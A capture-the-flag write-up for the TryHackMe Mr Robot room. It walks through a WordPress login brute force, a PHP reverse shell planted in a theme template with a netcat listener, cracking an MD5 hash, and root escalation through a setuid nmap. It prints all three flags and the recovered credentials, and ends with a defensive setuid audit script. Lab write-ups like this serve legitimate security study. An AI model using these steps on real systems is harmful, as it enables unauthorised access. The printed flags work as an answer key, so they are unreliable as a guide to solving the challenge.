Mr_Robot_CTF writeup - 5skr0ll3r/Try_Hack_Me GitHub Wiki

Mr_Robot_CTF

Flag1

Start this CTF with an nmap scan:

nmap -A -sV -vv -T5 --script vuln <ip>

-A aggressive scan (OS detection, version detection, script scanning and traceroute)

-sV service version detection

-vv very verbose output

-T5 set the timing template to the fastest level

--script vuln run the NSE scripts in the vuln category, which look for known vulnerabilities

Checking robots.txt, we find two files: fsocity.dic and key-1-of-3.txt

flag 1: http://<machine_ip>/key-1-of-3.txt

073403c8a58a1f80d943455fb30724b9

Flag2

The file fsocity.dic, found at http://<machine_ip>/fsocity.dic, is a wordlist. Using wpscan, we can brute force the login page found with the nmap scan:

http://<ip>:80/wp-login.php

If you open fsocity.dic you will notice that the file has a huge number of lines and many of them are duplicates. To fix this (with some help from Stack Overflow) I wrote a Python script that removes all duplicates:

```python
# Write the unique lines of fsocity.dic to newp.txt, keeping first-seen order.
infile = 'fsocity.dic'
outfile = 'newp.txt'

lines_seen = set()

with open(infile, 'r') as src, open(outfile, 'w') as dst:
    for line in src:
        # Compare the word itself, so a last line without a trailing newline
        # (or CRLF endings) does not slip through as a "different" entry.
        word = line.rstrip('\r\n')
        if word not in lines_seen:
            dst.write(word + '\n')
            lines_seen.add(word)
```

Run it with python3 <name_of_the_file>. From now on, use newp.txt as the wordlist.

We can guess the username elliot (because why not), or use newp.txt as both the name_list and the pass_list (this may take a while): wpscan --url http://<ip>:80/wp-login.php -U <name_list> -P <pass_list>

Creds: username elliot, password ER28-0652

After logging in, go to Appearance > Editor > 404 Template:

Delete the template's code and replace it with a PHP reverse shell; I used: http://pentestmonkey.net/tools/web-shells/php-reverse-shell

In the shell's code, change the IP address to your own and set the port number to 4444.

Start a netcat listener:

nc -lnvp <port_used_in_shell>

and go to:

http://<ip>:80/wp_admin/404.php

and you have a shell.

In /home/robot/ we see two files. We don't have permission to read the flag, but we can read password.raw-md5, which contains: robot:c3fcd3d76192e4007dfb496cca67e13b

Copy the hash and go to https://crackstation.net/ to crack it. Cracked hash: abcdefghijklmnopqrstuvwxyz

Once you have the password, try: su robot

As a result we get: su: must be run from a terminal

su needs a controlling terminal, so spawn a pseudo-terminal first: python -c 'import pty; pty.spawn("/bin/bash")'

Now retry su robot.

Cat the key file in /home/robot/ and you have the second flag: 822c73956184f694993bede3eb39f959

Flag3

For the last flag, since the hint is nmap, I suppose we can use it to escalate our privileges and get root access. First, list the setuid binaries owned by root:

find / -user root -perm -4000 -exec ls -la {} \;

/ start the search at the root directory

-user root only files owned by root

-perm -4000 only files with the setuid bit (mode 4000) set

-exec ls -la {} \; run ls -la on each match to see its owner and permissions

In one of the results we find the following: -rwsr-xr-x 1 root root 504736 Nov 13 2015 /usr/local/bin/nmap. The s in the owner's execute slot means the setuid bit is set, and the trailing x means any user can run it, so it executes with root privileges.

So by running nmap --interactive (an option that only old nmap versions still have) we can execute commands from inside nmap, which is running as root.

At the nmap prompt, type !sh. Now you can navigate to the root directory and cat key-3-of-3.txt: 04787ddef27c3dee1ee161b21670b4e4
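As an added defender-side check (not part of this writeup), the script below parses the output format of the find/ls -la command used above and flags setuid-root binaries that are not on an allowlist, which is how an administrator would catch a stray setuid nmap before it is abused. The nmap line is the one quoted above; the other sample lines and the allowlist are constructed assumptions.

```python
import re

# Constructed sample of `find / -user root -perm -4000 -exec ls -la {} \;` output.
# The nmap line is the one quoted in the writeup; the other lines are made up.
SAMPLE_FIND_OUTPUT = """\
-rwsr-xr-x 1 root root 504736 Nov 13  2015 /usr/local/bin/nmap
-rwsr-xr-x 1 root root  44168 May  7  2014 /bin/ping
-rwsr-xr-x 1 root root  47032 Feb 17  2014 /usr/bin/passwd
-rwSr--r-- 1 root root   1024 Jan  1  2015 /opt/odd-tool
"""

# Assumed allowlist: setuid-root binaries expected on a stock install of this host.
EXPECTED_SUID_ROOT = {"/bin/ping", "/bin/su", "/usr/bin/passwd", "/usr/bin/sudo"}

# Fields of an `ls -la` line: mode, links, owner, group, size, month, day, year/time, path
LS_LINE = re.compile(
    r"^(?P<mode>[-a-zA-Z]{10})\s+\d+\s+(?P<owner>\S+)\s+\S+\s+\d+\s+"
    r"\S+\s+\d+\s+\S+\s+(?P<path>/.*)$"
)


def parse_ls_line(line):
    """Return {'mode', 'owner', 'path'} for one ls -la line, or None if it does not parse."""
    m = LS_LINE.match(line.strip())
    return m.groupdict() if m else None


def is_setuid(mode):
    """True when the owner execute slot is 's' (setuid+exec) or 'S' (setuid without exec)."""
    return len(mode) == 10 and mode[3] in "sS"


def unexpected_suid_root(find_output, allowlist):
    """List setuid binaries owned by root that are not on the allowlist, in output order."""
    flagged = []
    for line in find_output.splitlines():
        entry = parse_ls_line(line)
        if entry is None:
            continue  # skip blank or malformed lines instead of crashing on them
        if entry["owner"] == "root" and is_setuid(entry["mode"]) and entry["path"] not in allowlist:
            flagged.append(entry["path"])
    return flagged


if __name__ == "__main__":
    for path in unexpected_suid_root(SAMPLE_FIND_OUTPUT, EXPECTED_SUID_ROOT):
        print("unexpected setuid-root binary:", path)
```

Feed it the real find output (for example via sys.stdin) and maintain the allowlist per host image; anything it prints is either an unreviewed package or a binary that should lose its setuid bit.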
